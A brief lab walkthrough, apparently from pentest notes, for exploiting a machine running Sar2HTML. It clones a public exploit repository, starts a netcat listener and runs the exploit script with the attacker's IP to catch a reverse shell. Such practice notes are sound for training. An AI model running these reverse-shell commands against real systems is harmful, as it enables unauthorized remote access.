Sar2HTML

[1]Github repo for automated exploit sudo git clone https://github.com/AssassinUKG/sar2HTML.git [2]Target IP 192.168.101.161 kali IP:192.168.101.160 a) nc listener: nc -nvlp 4444 b) ./sar2HTMLshell.py -ip 192.168.101.161 -rip 192.168.101.160:4444 -pe sar2HTML [3]Catch the shell

Last updated